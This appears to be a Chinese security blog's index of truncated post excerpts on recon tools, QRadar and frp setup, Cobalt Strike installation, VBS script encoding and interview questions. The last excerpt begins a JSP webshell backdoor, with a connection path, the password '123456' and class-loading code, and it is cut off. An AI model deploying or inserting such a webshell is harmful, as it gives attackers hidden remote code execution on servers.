工具大全
DNS记录查询子域:https://dns.bufferover.run/dns?q=baidu.com 在线CMS指纹识别:http://whatweb.bugscaner.com/look/ DNS数据储存库:https://securitytrails.com/dns-trails CSR在线生成工具:https://myssl.com/cs…
QRadar安装教程
以下是介绍使用Red Hat安装QRadar和挂载教程 1.安装官方QRadar ISO镜像(7.4.3)此方法对部分服务器生效,强烈推荐以下安装方法百分百成功。 小鱼干博主找了几个小时的rhel-server-7.7-x86镜像终于找到了,安装教程不易,且行且珍惜,链接如下rhel-server-7.7-x862.再把官方QRadar ISO镜像…
frp内网穿透
Linux服务端安装流程 1.版本查询: arch 2.版本下载: wget https://github.com/fatedier/frp/releases/download/v0.42.0/frp_0.42.0_linux_amd64.tar.gz 3.解压: tar -zxvf frp_0.42.0_linux_amd64.tar.gz 4.…
Cobalt Strike使用教程
Linux服务器安装流程 一、安装JDK yum search java | grep jdk 二、配置vi /etc/profile #java export JAVA_HOME=/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.282.b08-1.el7_9.x86_64 export PATH=$JAVA_HOME/…
Vbs加密介绍
Vbs加密介绍 背景 VBS脚本并不是自己用,我们都不希望自己辛辛苦苦努力的源码被别人免费占有,当然也可能是VBS源脚本文件包含密码等敏感信息,不希望使用者修改信息,防止出现错误。以下是VBS加密教程 新建一个encode.vbs文件导入以下代码 Option Explicit dim oEncoder, oFilesToEncode, file,…
安全岗位面试题目汇总
安全岗位面试题目汇总 目录 一、常用的外围打点工具有哪些? 二、描述一下外围打点的基本流程? 三、怎么识别CDN? 四、怎么判断靶标站点是windows系统还是Linux系统? 五、举常见的FOFA在外网打点过程中的查询语句? 六、常见的未授权访问漏洞有哪些? 七、文件上传功能的检测点有哪些? 八、常见的中间件有哪些,常见都有哪些相关漏洞? 九、介…
后门getshell
后门getshell 连接方式:xxx.x.x.x:xxxx/shell.jsp 连接密码:123456 <%! class U extends ClassLoader { U(ClassLoader c) { super(c); } public Class g(byte[] b) { return super.defineClass(b,…